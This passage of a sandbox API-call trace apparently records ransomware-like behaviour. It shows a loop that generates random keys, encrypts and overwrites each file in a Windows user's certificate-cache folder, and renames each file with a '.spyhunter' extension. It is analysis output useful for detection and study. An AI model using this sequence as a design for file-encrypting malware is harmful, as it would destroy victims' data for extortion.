pdwDataLen=0x248ee80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee80*=0x30) returned 1 [0151.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.706] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 152 [0151.706] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".txt") returned 0x0 [0151.706] GetProcessHeap () returned 0x2c0000 [0151.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.706] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee44*=0x194, lpOverlapped=0x0) returned 1 [0151.707] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.707] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee44*=0x194, lpOverlapped=0x0) returned 1 [0151.707] GetProcessHeap () returned 0x2c0000 [0151.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.707] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.708] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x248ee84*, lpNumberOfBytesWritten=0x248ee44*=0x4, lpOverlapped=0x0) returned 1 [0151.708] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee44*=0x30, lpOverlapped=0x0) returned 1 [0151.708] CloseHandle (hObject=0xb0) returned 1 [0151.708] GetProcessHeap () returned 0x2c0000 [0151.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.708] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.spyhunter") returned 162 [0151.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.spyhunter")) returned 1 [0151.712] GetProcessHeap () returned 0x2c0000 [0151.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.712] GetProcessHeap () returned 0x2c0000 [0151.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.712] GetProcessHeap () returned 0x2c0000 [0151.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feba78 | out: hHeap=0x2c0000) returned 1 [0151.712] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee80 | out: pbBuffer=0x248ee80) returned 1 [0151.712] GetProcessHeap () returned 0x2c0000 [0151.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.712] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee78*=0x30) returned 1 [0151.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 119 [0151.713] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0151.713] GetProcessHeap () returned 0x2c0000 [0151.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.713] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee3c*=0x156, lpOverlapped=0x0) returned 1 [0151.714] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffeaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.714] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee3c*=0x156, lpOverlapped=0x0) returned 1 [0151.714] GetProcessHeap () returned 0x2c0000 [0151.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.714] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.714] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x248ee7c*, lpNumberOfBytesWritten=0x248ee3c*=0x4, lpOverlapped=0x0) returned 1 [0151.714] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee3c*=0x30, lpOverlapped=0x0) returned 1 [0151.714] CloseHandle (hObject=0xb0) returned 1 [0151.714] GetProcessHeap () returned 0x2c0000 [0151.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.715] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.spyhunter") returned 129 [0151.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.spyhunter")) returned 1 [0151.715] GetProcessHeap () returned 0x2c0000 [0151.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.715] GetProcessHeap () returned 0x2c0000 [0151.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.715] GetProcessHeap () returned 0x2c0000 [0151.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8290 | out: hHeap=0x2c0000) returned 1 [0151.715] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee80 | out: pbBuffer=0x248ee80) returned 1 [0151.715] GetProcessHeap () returned 0x2c0000 [0151.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.716] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee78*=0x30) returned 1 [0151.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 152 [0151.722] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".txt") returned 0x0 [0151.722] GetProcessHeap () returned 0x2c0000 [0151.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.722] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee3c*=0x196, lpOverlapped=0x0) returned 1 [0151.723] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.723] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x196, lpNumberOfBytesWritten=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee3c*=0x196, lpOverlapped=0x0) returned 1 [0151.723] GetProcessHeap () returned 0x2c0000 [0151.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.723] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.723] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x248ee7c*, lpNumberOfBytesWritten=0x248ee3c*=0x4, lpOverlapped=0x0) returned 1 [0151.723] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee3c*=0x30, lpOverlapped=0x0) returned 1 [0151.723] CloseHandle (hObject=0xb0) returned 1 [0151.724] GetProcessHeap () returned 0x2c0000 [0151.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.724] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.spyhunter") returned 162 [0151.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.spyhunter")) returned 1 [0151.725] GetProcessHeap () returned 0x2c0000 [0151.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.725] GetProcessHeap () returned 0x2c0000 [0151.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.725] GetProcessHeap () returned 0x2c0000 [0151.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feb8f0 | out: hHeap=0x2c0000) returned 1 [0151.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee78 | out: pbBuffer=0x248ee78) returned 1 [0151.725] GetProcessHeap () returned 0x2c0000 [0151.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee70*=0x30) returned 1 [0151.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 152 [0151.727] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".txt") returned 0x0 [0151.727] GetProcessHeap () returned 0x2c0000 [0151.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.727] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee34*=0x188, lpOverlapped=0x0) returned 1 [0151.728] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.728] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee34*=0x188, lpOverlapped=0x0) returned 1 [0151.728] GetProcessHeap () returned 0x2c0000 [0151.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.729] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.729] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x248ee74*, lpNumberOfBytesWritten=0x248ee34*=0x4, lpOverlapped=0x0) returned 1 [0151.729] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee34*=0x30, lpOverlapped=0x0) returned 1 [0151.729] CloseHandle (hObject=0xb0) returned 1 [0151.729] GetProcessHeap () returned 0x2c0000 [0151.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.729] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.spyhunter") returned 162 [0151.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.spyhunter")) returned 1 [0151.744] GetProcessHeap () returned 0x2c0000 [0151.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.744] GetProcessHeap () returned 0x2c0000 [0151.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.744] GetProcessHeap () returned 0x2c0000 [0151.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feb768 | out: hHeap=0x2c0000) returned 1 [0151.744] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee78 | out: pbBuffer=0x248ee78) returned 1 [0151.744] GetProcessHeap () returned 0x2c0000 [0151.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.744] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee70*=0x30) returned 1 [0151.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 152 [0151.745] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".txt") returned 0x0 [0151.745] GetProcessHeap () returned 0x2c0000 [0151.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.745] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee34*=0x188, lpOverlapped=0x0) returned 1 [0151.746] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.746] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee34*=0x188, lpOverlapped=0x0) returned 1 [0151.746] GetProcessHeap () returned 0x2c0000 [0151.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.746] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.746] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x248ee74*, lpNumberOfBytesWritten=0x248ee34*=0x4, lpOverlapped=0x0) returned 1 [0151.746] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee34*=0x30, lpOverlapped=0x0) returned 1 [0151.747] CloseHandle (hObject=0xb0) returned 1 [0151.747] GetProcessHeap () returned 0x2c0000 [0151.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.748] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.spyhunter") returned 162 [0151.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.spyhunter")) returned 1 [0151.749] GetProcessHeap () returned 0x2c0000 [0151.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.749] GetProcessHeap () returned 0x2c0000 [0151.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.749] GetProcessHeap () returned 0x2c0000 [0151.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feb5e0 | out: hHeap=0x2c0000) returned 1 [0151.749] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee70 | out: pbBuffer=0x248ee70) returned 1 [0151.749] GetProcessHeap () returned 0x2c0000 [0151.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.749] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee68*=0x30) returned 1 [0151.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0151.750] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".txt") returned 0x0 [0151.750] GetProcessHeap () returned 0x2c0000 [0151.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.750] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee2c*=0x180, lpOverlapped=0x0) returned 1 [0151.751] 